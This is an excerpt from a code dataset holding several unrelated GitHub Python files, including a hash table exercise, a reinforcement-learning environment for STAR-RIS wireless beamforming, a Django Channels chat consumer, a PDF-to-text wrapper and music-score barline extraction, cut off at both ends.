__name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Chris000888/newsletter","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29784610081","text":"alpha=0.75 #global variable: the load factor\r\nclass HNode: #node class for the singly linked list\r\n def __init__(self,k,v): #constructor\r\n self.key=k #key\r\n self.v=v #value\r\n self.next=None\r\n\r\nclass Dict: #hash table (division hashing + chaining)\r\n def __init__(self): #constructor\r\n self.cap=8 #initial capacity 8, i.e. hash table length m=8\r\n self.n=0 #number of elements in the hash table\r\n self.ha=[None]*self.cap #allocate the cap buckets of the hash table\r\n\r\n def resize(self): #double the capacity\r\n newha=[None]*2*self.cap\r\n self.n=0\r\n for i in range(self.cap):\r\n p=self.ha[i]\r\n while p!=None:\r\n d=hash(p.key) % self.cap #compute the hash value\r\n q=HNode(p.key,p.v) #create a new node q\r\n q.next=newha[d] #insert q at the head of the newha[d] list\r\n newha[d]=q\r\n self.n+=1 #element count increases by 1\r\n p=p.next\r\n self.ha=newha\r\n self.cap=2*self.cap\r\n\r\n def insert(self,k,v): #insert (k,v) into the hash table\r\n if self.n>=int(alpha*self.cap): #if the element count reaches the expected limit\r\n self.resize() #expand the capacity\r\n p=self.search(k) #search for key k\r\n if p!=None: #if key k already exists\r\n p.v=v #update v\r\n else: #if key k does not exist, insert it\r\n d=hash(k) % self.cap #compute the hash value\r\n p=HNode(k,v) #create node p for key k\r\n p.next=self.ha[d] #insert p at the head of the ha[d] list\r\n self.ha[d]=p\r\n self.n+=1 #element count increases by 1\r\n\r\n def search(self,k):\t #search for key k; return its node on success, else None\r\n d=hash(k) % self.cap\t\t #compute the hash value\r\n p=self.ha[d] #p points to the first node of the ha[d] list\r\n while p!=None and p.key!=k: #look for the node p whose key is k\r\n p=p.next\r\n return p #return p\r\n\r\n def __contains__(self,k): #overload the in operator\r\n if self.search(k)!=None:\r\n return True\r\n else:\r\n return False\r\n\r\n def __getitem__(self,k): #get value by key\r\n p=self.search(k)\r\n if p!=None:\r\n return p.v\r\n else:\r\n return None\r\n \r\n def __setitem__(self,k,d): #set value by key\r\n self.insert(k,d)\r\n\r\n def delete(self,k): #delete key k\r\n d=hash(k) % self.cap\r\n if self.ha[d]==None: return\r\n if self.ha[d].key==k: #the first node holds k\r\n self.ha[d]=self.ha[d].next\r\n return\r\n pre=self.ha[d] #k is not in the first node; scan the rest\r\n p=pre.next\r\n while p!=None and p.key!=k:\r\n pre=p #pre and p move forward together\r\n p=p.next\r\n if p!=None: #found the node p with key k\r\n pre.next=p.next #remove node p\r\n\r\n def dispht(self): #print all elements\r\n for i in range(self.cap):\r\n p=self.ha[i]\r\n while p!=None:\r\n print(\"%3d[%d]\" %(p.key,p.v),end='')\r\n p=p.next\r\n print()\r\n \r\n#main program\r\nif __name__ == '__main__':\r\n a=[1,2,5,4,1,2,5,1,6,20,5,10,9,6]\r\n print(\"(1) build dic\")\r\n dic=Dict()\r\n print(\" initial capacity:\",dic.cap)\r\n print(\"(2) insert some elements\")\r\n for i in range(len(a)):\r\n if a[i] in dic: #if a[i] already exists, increase its count by 1\r\n dic[a[i]]+=1\r\n else: #if a[i] does not exist, set its count to 1\r\n dic[a[i]]=1\r\n print(\" capacity:\",dic.cap)\r\n print(\"(3) print all elements:\")\r\n dic.dispht()\r\n k=2\r\n print(\"(4) delete key %d\" %(k))\r\n dic.delete(k)\r\n print(\"(5) all elements after deletion:\")\r\n dic.dispht()\r\n \r\n","repo_name":"renyumeng1/sound-code","sub_path":"ch8/Exam8-19.py","file_name":"Exam8-19.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"562410951","text":"import site\ntry:\n\timport cv2\nexcept ImportError:\n\tsite.addsitedir('D:\\\\Program Files\\\\opencv-4.5.0-dldt-2021.1-vc16-avx2\\\\opencv\\\\build\\\\python')\nimport cv2\nimport argparse\nfrom pathlib import Path\nimport numpy as np\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('input', type=Path, nargs=1)\n\tparser.add_argument('output', type=Path, nargs=1)\n\targs = parser.parse_args()\n\n\tinput_path: Path = args.input[0]\n\toutput_path: Path = args.output[0]\n\tif not input_path.is_dir() and output_path.is_dir():\n\t\tprint('converting npy to png...')\n\n\t\tdataset = np.load(input_path)\n\t\tfor idx, row in enumerate(dataset):\n\t\t\tfilename = '%s/%s.png' % (output_path, str(idx))\n\t\t\tprint('writing', filename)\n\t\t\tcv2.imwrite(filename, row)\n\n\tif input_path.is_dir() and not output_path.is_dir():\n\t\tprint('converting png to npy...')\n\t\toutput_dataset = []\n\t\tfor file in input_path.glob('*.png'):\n\t\t\tfilename = file.as_posix()\n\t\t\tprint('reading', filename)\n\t\t\timg = cv2.imread(filename, cv2.IMREAD_ANYDEPTH)\n\t\t\toutput_dataset.append(img)\n\t\tout: np.ndarray = np.asarray(output_dataset)\n\t\tprint('output array size', out.shape)\n\t\tnp.save(output_path, out)\n\n\tprint('done')\n","repo_name":"bearnl/toolbox","sub_path":"npy2png.py","file_name":"npy2png.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39314260433","text":"from gym import spaces\n# import Paras\nimport copy\nimport math\nimport os\nimport glob\nimport time\nfrom datetime import datetime\n\nimport torch\nimport numpy as np\nimport gym\n\nfrom gym import spaces\nimport copy\nimport math\nimport os\nimport glob\nimport time\nfrom datetime import datetime\n\n#TODO discrete deployment?\nclass My_Env(gym.Env):\n def __init__(self):\n super(My_Env, self).__init__()\n\n self.K = 6 #total users\n\n self.M = 4 #antenna number\n self.N = 10 #STAR-RIS element number\n self.N_h = 2 #horizontal element number\n self.N_v = self.N/self.N_h #vertical element number\n\n self.power_unit = 100 #TODO for each user power unit?\n self.B = 1 #MHz? 
to calculate data rate by multiple SINR\n self.noise_power = 3*10**(-13) #noise power\n\n self.T = 50 #DRL max steps\n self.sum_rate = 0 #reward as sum-rate\n\n self.W_list = np.ones(shape=(self.M, self.K)) + 0 * 1j\n\n self.CSI_B_K = np.random.normal(scale=1, size=(self.M, self.K)) + np.random.normal(scale=1, size=(self.M, self.K)) * 1j\n self.CSI_R_K = np.random.normal(scale=1, size=(self.N, self.K)) + np.random.normal(scale=1, size=(self.N, self.K)) * 1j\n self.CSI_B_R = np.random.normal(scale=1, size=(self.M, self.N)) + np.random.normal(scale=1, size=(self.M, self.N)) * 1j\n\n self.FD_B_K = np.random.normal(scale=1, size=(self.M, self.K, self.T)) + np.random.normal(scale=1, size=(self.M, self.K, self.T)) * 1j\n self.FD_R_K = np.random.normal(scale=1, size=(self.N, self.K, self.T)) + np.random.normal(scale=1, size=(self.N, self.K, self.T)) * 1j\n self.FD_B_R = np.random.normal(scale=1, size=(self.M, self.N, self.T)) + np.random.normal(scale=1, size=(self.M, self.N, self.T)) * 1j\n\n # fading intensity\n self.fading_scale_BS = 0.1\n self.fading_scale_RIS = 0.2\n self.FD_B_K = self.fading_scale_BS * self.FD_B_K\n self.FD_R_K = self.fading_scale_RIS * self.FD_R_K\n self.FD_B_R = self.fading_scale_RIS * self.FD_B_R #TODO should be RIS fading scale?\n self.Rice = 5 # Rician factor\n self.scale = 10000\n\n # positions\n self.BS_position = [2000, 2000, 5]\n self.STAR_position = [0, 0, 200]\n self.link_position = [0, 0, 0]\n self.type = np.zeros(self.K) #one entry per user: 1 reflection / -1 transmission\n self.P_K_list = np.random.normal(scale=3, size=(4, self.K)) #rows 0-2: x/y/z; row 3 zeroed below\n self.P_K_list[3, :] = 0\n self.P_K_list_initial = copy.deepcopy(self.P_K_list)\n self.t = 0\n\n # create vectors for storing the R/T coefficients\n # theta represents phase shift\n self.theta_R = np.random.normal(scale=1, size=(self.N)) + np.random.normal(scale=1, size=(self.N)) * 1j\n self.theta_T = np.random.normal(scale=1, size=(self.N)) + np.random.normal(scale=1, size=(self.N)) * 1j\n # Theta_eye represents the matrix to save phase shift\n self.Theta_eye_R = np.eye(self.N)\n self.Theta_eye_T = np.eye(self.N)\n # save data rate for each user\n self.data_rate_list = np.zeros(self.K)\n # self.data_rate_list_R = np.zeros(self.KR)\n # self.data_rate_list_T = np.zeros(self.KT)\n\n # N reflection phase shift, N reflection amplitude, N transmission phase shift, M*K phase shift, M*K power,\n # x y z position for STAR_RIS, number of linked user, move up / down\n self.action_dim = 3 * self.N + 2 * self.M * self.K + 2 + 1 + 1\n self.action_space = spaces.Box(low=0, high=1, shape=(self.action_dim,), dtype=np.float32)\n # BS to user CSI, STAR-RIS element to user CSI, BS to STAR-RIS element CSI\n self.num_states = 2*self.M * self.K + 2*self.N * self.K + 2*self.M*self.N\n self.observation_space = spaces.Box(low=0, high=100, shape=(self.num_states,), dtype=np.float32)\n\n\n\n\n #TODO calculate CSI information\n def calculate_CSI(self):\n # calculate pathloss from BS to STAR-RIS\n distance_B_R = np.sqrt((self.BS_position[0]-self.STAR_position[0])**2 + (self.BS_position[1]-self.STAR_position[1])**2 + (self.BS_position[2]-self.STAR_position[2])**2)\n pathloss_B_R = 10 ** (-30 / 10) * (distance_B_R ** (-2.2))\n\n # calculate DOD\n return\n\n #TODO calculate data rate for each user\n def calculate_datarate(self):\n\n return\n\n #TODO get the observation environment\n def get_state(self):\n CSI_B_K_state = self.CSI_B_K.ravel()\n CSI_R_K_state = self.CSI_R_K.ravel()\n CSI_B_R_state = self.CSI_B_R.ravel()\n CSI_B_K_info = np.append(np.real(CSI_B_K_state), np.imag(CSI_B_K_state))\n 
CSI_R_K_info = np.append(np.real(CSI_R_K_state), np.imag(CSI_R_K_state))\n CSI_B_R_info = np.append(np.real(CSI_B_R_state), np.imag(CSI_B_R_state))\n #TODO need confirmation\n return np.concatenate([CSI_B_R_info*self.scale, CSI_B_K_info*self.scale, CSI_R_K_info*self.scale])\n\n #TODO user random move\n def user_move(self):\n # perform random movement for users\n self.P_K_list[0, :] = self.P_K_list[0, :] + np.random.normal(scale=0.5, size=(1, self.K))\n self.P_K_list[1, :] = self.P_K_list[1, :] + np.random.normal(scale=0.5, size=(1, self.K))\n\n # TODO divide users into reflection and transmission\n # 1 represents reflection\n # -1 represents transmission\n def divide(self):\n for i in range(self.K):\n if ((self.P_K_list[0][i] - self.STAR_position[0]) / (self.link_position[0] - self.STAR_position[0]) -\n (self.P_K_list[1][i] - self.STAR_position[1]) / (self.link_position[1] - self.STAR_position[1])) * \\\n ((self.BS_position[0] - self.STAR_position[0]) / (self.link_position[0] - self.STAR_position[0]) -\n (self.BS_position[1] - self.STAR_position[1]) / (self.link_position[1] - self.STAR_position[1])) >= 0:\n self.type[i] = 1\n else:\n self.type[i] = -1\n\n\n #TODO step function\n def step(self, action):\n action = action.reshape(-1)\n\n # reflection coefficient\n phaseshift_reflection = action[0:self.N] * math.pi\n amplitude_reflection = (action[self.N:2*self.N] + 1) / 2 # why +1/2\n self.theta_R = np.cos(phaseshift_reflection) * amplitude_reflection + np.sin(phaseshift_reflection) * amplitude_reflection * 1j\n self.Theta_eye_R = np.eye(self.N) * self.theta_R\n\n # transmission coefficient >=0 pi/2, <0 -pi/2\n phaseshift_transmission = (action[2*self.N:3*self.N] >= 0) * 1 * math.pi/2 + (action[2*self.N:3*self.N] < 0) * -1 * math.pi/2\n amplitude_transmission = np.sqrt(1 - amplitude_reflection**2)\n self.theta_T = np.cos(phaseshift_transmission) * amplitude_transmission + np.sin(phaseshift_transmission) * amplitude_transmission * 1j\n self.Theta_eye_T = np.eye(self.N) * self.theta_T\n\n # BS beamforming\n phaseshift_BS = action[3*self.N:3*self.N+self.M*self.K] * math.pi\n power_BS = (action[3*self.N+self.M*self.K:3*self.N+2*self.M*self.K] + 1)/2 * self.power_unit\n w_array = np.cos(phaseshift_BS) * power_BS + np.sin(phaseshift_BS) * power_BS * 1j\n self.W_list = np.reshape(w_array, (self.M, self.K))\n\n # STAR-RIS position and face direction\n self.STAR_position = [action[3*self.N+2*self.M*self.K]*100, action[3*self.N+2*self.M*self.K+1]*100, 200]\n self.link_position = [self.P_K_list[0][6*action[3*self.N+2*self.M*self.K+2]] + action[3*self.N+2*self.M*self.K+3] * 10,\n self.P_K_list[1][6*action[3*self.N+2*self.M*self.K+2]],\n self.P_K_list[2][6*action[3*self.N+2*self.M*self.K+2]]]\n\n self.divide()\n self.calculate_datarate()\n self.sum_rate = sum(self.data_rate_list)\n\n self.user_move()\n self.calculate_CSI()\n next_state = self.get_state()\n self.t += 1\n if self.t >= self.T:\n done = True\n else:\n done = False\n\n return np.array([next_state]).astype(np.float32), self.sum_rate, done\n\n #TODO reset the environment, user position, time, observation state, STAR position???\n def reset(self, *args, **kwargs):\n self.P_K_list = copy.deepcopy(self.P_K_list_initial)\n state = self.get_state()\n self.t = 0\n return np.array([state]).astype(np.float32)\n\n #TODO","repo_name":"Porthoos/DRL_STAR_LYW","sub_path":"Deep-Reinforcment-Learning-main/Communication 
GYM/STAR-RIS/My_Env.py","file_name":"My_Env.py","file_ext":"py","file_size_in_byte":8429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"45558651583","text":"#!/usr/bin/env python3\n\n\"\"\"Prepares a simple TVM library for testing.\"\"\"\n\nfrom os import path as osp\nimport sys\n\nimport tvm\n\ndef main():\n n = tvm.var('n')\n A = tvm.placeholder((n,), name='A')\n B = tvm.placeholder((n,), name='B')\n C = tvm.compute(A.shape, lambda *i: A(*i) + B(*i), name='C')\n s = tvm.create_schedule(C.op)\n s[C].parallel(s[C].op.axis[0])\n print(tvm.lower(s, [A, B, C], simple_mode=True))\n tvm.build(s, [A, B, C], 'llvm --system-lib').save(osp.join(sys.argv[1], 'test.o'))\n\nif __name__ == '__main__':\n main()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/3rdparty/tvm/rust/tests/test_tvm_basic/src/build_test_lib.py","file_name":"build_test_lib.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"2460101117","text":"# -*- coding: utf-8 -*-\n\"\"\"Fund manager security-selection and market-timing factors (computed from JuYuan data)\"\"\"\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\n\nimport QuantStudio.api as QS\nfd = QS.FactorDB.FactorTools\nFactorize = QS.FactorDB.Factorize\n\n\ndef defFactor(args={}, debug=False):\n Factors = []\n \n JYDB = args[\"JYDB\"].connect()\n \n FT = JYDB.getTable(\"公募基金经理(新)(基金经理ID)\", args={\"多重映射\": True})\n IDs = FT.getID()\n \n # ####################### Brinson model #######################\n FT = JYDB.getTable(\"公募基金衍生指标_基金经理Brinson业绩归因\", args={\"回溯天数\": 0})\n look_back_period = {\"6m\": 6, \"1y\": 12, \"2y\": 24, \"3y\": 36, \"5y\": 60, \"10y\": 120}# look-back periods\n for iLookBack, iLookBackPeriod in look_back_period.items():\n Factors.append(FT.getFactor(\"资产配置\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_aa_{iLookBack}\"))\n Factors.append(FT.getFactor(\"个股选择\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_ss_{iLookBack}\"))\n Factors.append(FT.getFactor(\"交互作用\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_in_{iLookBack}\"))\n Factors.append(FT.getFactor(\"总主动作用\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_ta_{iLookBack}\"))\n \n UpdateArgs = {\n \"因子表\": \"mf_manager_cn_factor_selection_timing_jy\",\n \"默认起始日\": dt.datetime(2002,1,1),\n \"最长回溯期\": 3650,\n \"IDs\": IDs\n }\n return Factors, UpdateArgs\n\nif __name__==\"__main__\":\n import logging\n Logger = logging.getLogger()\n \n JYDB = QS.FactorDB.JYDB(logger=Logger)\n JYDB.connect()\n \n #TDB = QS.FactorDB.SQLDB(config_file=\"SQLDBConfig_WMTest.json\", logger=Logger)\n TDB = QS.FactorDB.HDF5DB(logger=Logger)\n TDB.connect()\n \n Args = {\"JYDB\": JYDB, \"LDB\": TDB}\n Factors, UpdateArgs = defFactor(args=Args, debug=True)\n \n StartDT, EndDT = dt.datetime(2010, 1, 1), dt.datetime(2021, 10, 20)\n DTs = JYDB.getTradeDay(start_date=StartDT.date(), end_date=EndDT.date(), output_type=\"datetime\")\n DTRuler = JYDB.getTradeDay(start_date=StartDT.date()-dt.timedelta(365), end_date=EndDT.date(), output_type=\"datetime\")\n \n IDs = UpdateArgs[\"IDs\"]\n \n CFT = QS.FactorDB.CustomFT(UpdateArgs[\"因子表\"])\n CFT.addFactors(factor_list=Factors)\n CFT.setDateTime(DTRuler)\n CFT.setID(IDs)\n \n TargetTable = CFT.Name\n CFT.write2FDB(factor_names=CFT.FactorNames, ids=IDs, dts=DTs, \n factor_db=TDB, table_name=TargetTable, \n if_exists=\"update\", subprocess_num=20)\n \n TDB.disconnect()\n JYDB.disconnect()","repo_name":"Scorpi000/QSExt","sub_path":"QSExt/FactorDef/JY/mf_manager_cn_factor_selection_timing_jy.py","file_name":"mf_manager_cn_factor_selection_timing_jy.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"30653092649","text":"#Implement a program that receives a vector of integers and determines the frequency of each element in the vector, creating a new vector with the corresponding frequencies.\n\ndef frequenciaDeElementos(vetor, numero): # Function that receives a vector and a number and returns the frequency of the number in the vector\n frequencia = 0 # Variable that will hold the frequency of the number in the vector\n for i in range(len(vetor)): # Loop that traverses the vector\n if vetor[i] == numero: # Check whether the current vector value equals the number\n frequencia += 1 # If so, increment the frequency by one\n return frequencia # Return the frequency of the number in the vector\n\n\nprint(frequenciaDeElementos([1, 1, 3, 4, 5, 6, 7, 8, 9, 10], 1))\n\n","repo_name":"emanoelCarvalho/exercise-logic-programing","sub_path":"src/Python/Vetores/Questao-4.py","file_name":"Questao-4.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35640990178","text":"from component.cipher import *\nfrom django.conf import settings\nfrom datetime import datetime\nimport subprocess\nimport sys\nimport os\nimport shutil\nfrom multiprocessing import Pool\n#import datetime\nfrom concurrent import futures\n\nZIP_PATH='FFReport'\ndef report_exec(cmd):\n try:\n pass#os.system(cmd)\n except Exception as e:\n print(e)\n p = subprocess.Popen(cmd, shell = True,#[sys.executable, os.path.join(settings.BASE_DIR, 'sponsor', 'birt_ff_report.py')],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n x,y = p.communicate()\n return (x,y)\n\nclass FFReport(object):\n \"\"\"Class to generate family factsheet report\"\"\"\n def __init__(self, record_id):\n self.project_detail = record_id\n\n #def report_exec(self, cmd):\n #\tos.system(cmd)\n\n def generate(self):\n cipher = AESCipher()\n obj_slum = self.project_detail.sponsor_project_details.slum\n logged_sponsor = self.project_detail.sponsor_project_details.sponsor_project.sponsor\n sponsored_household = self.project_detail.household_code\n rp_slum_code = str(obj_slum.shelter_slum_code)\n sub_folder = (str(rp_slum_code)+str(len(sponsored_household)) + str(datetime.now())).replace(' ','_')\n folder_name = os.path.join(settings.BASE_DIR, 'media', ZIP_PATH, str(logged_sponsor.organization_name).replace(' ', '_'))\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n folder_name = os.path.join(folder_name, sub_folder)\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\n execute_command = []\n for household_code in sponsored_household:\n key = cipher.encrypt(str(rp_slum_code) + '|' + str(household_code) + '|' + str(logged_sponsor.user.id))\n file = os.path.join(folder_name, \"household_code_\" + str(household_code) + \".pdf\")\n com = settings.BIRT_REPORT_CMD.format(file , key)\n #print com\n execute_command.append(com)\n #p = subprocess.Popen(com, shell = True,#[sys.executable, os.path.join(settings.BASE_DIR, 'sponsor', 'birt_ff_report.py')],\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n #x,y = p.communicate()\n\n #print x,y\n #os.system(com)\n #print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n try:\n with 
futures.ThreadPoolExecutor(max_workers=3) as pool:\n pool.map(report_exec, execute_command)\n #p = Pool(2)\n #p.map(report_exec, execute_command)\n #p.close()\n #p.join()\n except Exception as e:\n print(e)\n #print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n shutil.make_archive(folder_name, 'zip',folder_name)\n delete_command = \"rm -rf \" + folder_name\n os.system(delete_command)\n\n if self.project_detail.zip_file:\n storage, path = self.project_detail.zip_file.storage, self.project_detail.zip_file.path\n storage.delete(path)\n\n #self.project_detail.zip_file=os.path.join('media', ZIP_PATH, str(logged_sponsor.organization_name).replace(' ','_'),sub_folder+'.zip')\n #self.project_detail.zip_created_on=datetime.now()\n self.project_detail.__class__.objects.filter(pk=self.project_detail.id).update(zip_created_on=datetime.now(),zip_file=os.path.join( ZIP_PATH, str(logged_sponsor.organization_name).replace(' ','_'),sub_folder+'.zip'))\n","repo_name":"ShelterAssociates/Shelter","sub_path":"sponsor/birt_ff_report.py","file_name":"birt_ff_report.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"5858889284","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom . import natural_language_processing\nimport json\n\n\ndef index(request):\n context = {\n\n }\n return render(request,'index.html',context)\n\ndef classify(request):\n if request.method == 'POST':\n query = request.POST.get('news',None)\n print(type(query))\n print(query)\n result = natural_language_processing.predict_news(query)\n result = result[0]\n if result == 0:\n return HttpResponse(\"Other News\")\n elif result == 1:\n return HttpResponse(\" Sports news !!!\")\n else:\n pass\n","repo_name":"zparvez2z/News_classifier","sub_path":"News_classifier/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74323074484","text":"import os\n\n\nclass PDF2TXT:\n def __init__(self):\n pass\n\n def pdf2txt(self, file_path: str, raise_errors=True) -> str:\n if not file_path.endswith('.pdf'):\n if raise_errors:\n raise Exception('Failed to LOAD file. Must be PDF')\n else:\n return None\n\n file_out_path = file_path[:-4] + '.txt'\n\n # main command\n cmd = 'pdftotext \"%s\" \"%s\"' % (file_path, file_out_path)\n os.system(cmd)\n\n if not os.path.isfile(file_out_path) or os.path.getsize(file_out_path) == 0:\n if raise_errors:\n raise Exception('pdf2txt: Failed to generate TXT (No .txt file))')\n else:\n return None\n\n try:\n with open(file_out_path, 'r', encoding='unicode_escape') as f:\n text = ' '.join(f.readlines())\n if '\\x00' in text:\n text = text.replace('\\x00', ' ')\n text = text.encode('utf-8', 'replace').decode('utf-8')\n except Exception as e:\n if raise_errors:\n raise Exception('Decode problem. No .txt file. 
' + str(e))\n else:\n return None\n\n return text\n","repo_name":"ishvlad/mlprior","sub_path":"utils/pdf2txt.py","file_name":"pdf2txt.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33225068831","text":"import numpy as np\r\nimport os\r\n\r\nPath= os.getcwd().replace('\\\\','/')+'/P862/Software/source/'\r\nscorelist=[]\r\n#--------Calculate the average score-----------------------------#\r\nwith open(Path+'_pesq_results.txt','r') as file:\r\n for line in file.readlines()[1:]:\r\n line=line.strip()\r\n if len(line)!=0:\r\n score=line.split('\\t')[1]\r\n scorelist.append(float(score))\r\nabc=np.array(scorelist)\r\nprint('The average score of PESQ is %.3f' %np.mean(abc))\r\n ","repo_name":"SIFANWU/Deep-Denoising-Autoencoder","sub_path":"PESQ_score.py","file_name":"PESQ_score.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"1700837919","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.room_name = None\n self.room_group_name = None\n self.user = None\n\n async def connect(self):\n self.room_name = self.scope[\"url_route\"][\"kwargs\"][\"room_name\"]\n self.room_group_name = f\"chat_{self.room_name}\"\n self.user = self.scope[\"user\"].username or \"Anonymous\"\n\n # join room group\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n\n async def receive(self, text_data):\n # load text_date => come from response\n text_data_json = json.loads(text_data)\n # get message from text_data_json\n message = text_data_json[\"message\"]\n \n await self.channel_layer.group_send(\n self.room_group_name,\n {\"type\": \"send_message\", \"message\": message, \"username\": self.user},\n )\n\n async def send_message(self, event):\n message = event[\"message\"]\n username = event[\"username\"]\n\n await self.send(\n text_data=json.dumps({\"message\": message, \"username\": username})\n )\n","repo_name":"faresemad/DjChat","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29920032683","text":"\n\nimport cv2\nimport numpy as np\n\nfrom . 
import layers\nfrom .bbox import *\nfrom .utils import get_unit_size\nfrom .general_filtering_rules import filter_out_of_range_bbox\n\n\ndef get_degree(line):\n return np.rad2deg(np.arctan2(line[3] - line[1], line[2] - line[0]))\n\n\ndef filter_lines(lines, min_degree=75):\n staffs = layers.get_layer('staffs')\n\n lines = filter_out_of_range_bbox(lines)\n min_y = min([st.y_upper for st in staffs.reshape(-1, 1).squeeze()])\n max_y = max([st.y_lower for st in staffs.reshape(-1, 1).squeeze()])\n\n cands = []\n for line in lines:\n degree = get_degree(line)\n if degree < min_degree:\n continue\n\n if line[1] < min_y or line[3] > max_y:\n continue\n\n cands.append(line)\n return cands\n\n\ndef get_barline_map(symbols, bboxes):\n img = np.zeros_like(symbols)\n for box in bboxes:\n box = list(box)\n if box[2]-box[0] == 0:\n box[2] += 1\n img[box[1]:box[3], box[0]:box[2]] += symbols[box[1]:box[3], box[0]:box[2]]\n img[img>1] = 1\n return img\n\n\ndef get_barline_box(bmap):\n ker = np.ones((5, 2), dtype=np.uint8)\n ext_bmap = cv2.erode(cv2.dilate(bmap.astype(np.uint8), ker), ker)\n bboxes = get_bbox(ext_bmap)\n\n valid_box = []\n heights = []\n for box in bboxes:\n unit_size = get_unit_size(*get_center(box))\n h = box[3] - box[1]\n if h > unit_size:\n heights.append(h)\n valid_box.append(box)\n\n return valid_box\n\n\ndef draw_lls(lines, ori_img):\n img = to_rgb_img(ori_img)\n for line in lines:\n degree = get_degree(line)\n cv2.rectangle(img, (line[0], line[1]), (line[2], line[3]), (0, 255, 0), 2)\n msg = f\"{degree:.2f}\"\n cv2.putText(img, msg, (line[2]+2, line[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 0), 1)\n return img\n\n\nif __name__ == \"__main__\":\n symbols = layers.get_layer('symbols_pred')\n stems = layers.get_layer('stems_rests_pred')\n notehead = layers.get_layer('notehead_pred')\n clefs = layers.get_layer('clefs_keys_pred')\n staffs = layers.get_layer('staffs')\n\n mix = symbols - stems - notehead - clefs\n mix[mix<0] = 0\n\n lines = find_lines(mix)\n lines = filter_lines(lines)\n bmap = get_barline_map(symbols, lines) + stems\n bmap[bmap>1] = 1\n bboxes = get_barline_box(bmap)\n\n bmap = to_rgb_img(bmap)\n for box in bboxes:\n cv2.rectangle(bmap, (box[0], box[1]), (box[2], box[3]), (0, 255, 0), 2)\n unit_size = get_unit_size(*get_center(box))\n ratio = (box[3] - box[1]) / unit_size\n if ratio > 9:\n cv2.putText(bmap, f\"{ratio:.2f}\", (box[2]+2, box[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 1)\n","repo_name":"meteo-team/oemer","sub_path":"oemer/barline_extraction.py","file_name":"barline_extraction.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"76"} +{"seq_id":"25875450900","text":"'''\nCreated on 10 Jan 2021\n\n@author: danan\n'''\nimport numpy as np\ndef strel( line_length=15, degrees=0):\n \n deg90 = degrees%90\n if deg90 > 45:\n alpha = np.pi * (90 - deg90) / 180\n else:\n alpha = np.pi * deg90 / 180\n ray = (line_length - 1)/2;\n \n ## We are interested only in the discrete rectangle which contains the diameter\n ## However we focus our attention to the bottom left quarter of the circle,\n ## because of the central symmetry.\n c = int(round (ray * np.cos (alpha)) +1)\n r = int(round (ray * np.sin (alpha)) +1)\n ## Line rasterization\n line = np.zeros((r, c))\n m = np.tan(alpha)\n cols = np.array(range(1,c+1))\n rows = float(r) - np.fix (m * (cols - 0.5))\n for i in range(len(cols)):\n line[int(rows[i] - 1), int(cols[i] -1)] = 1\n #preparing blocks \n linestrip = 
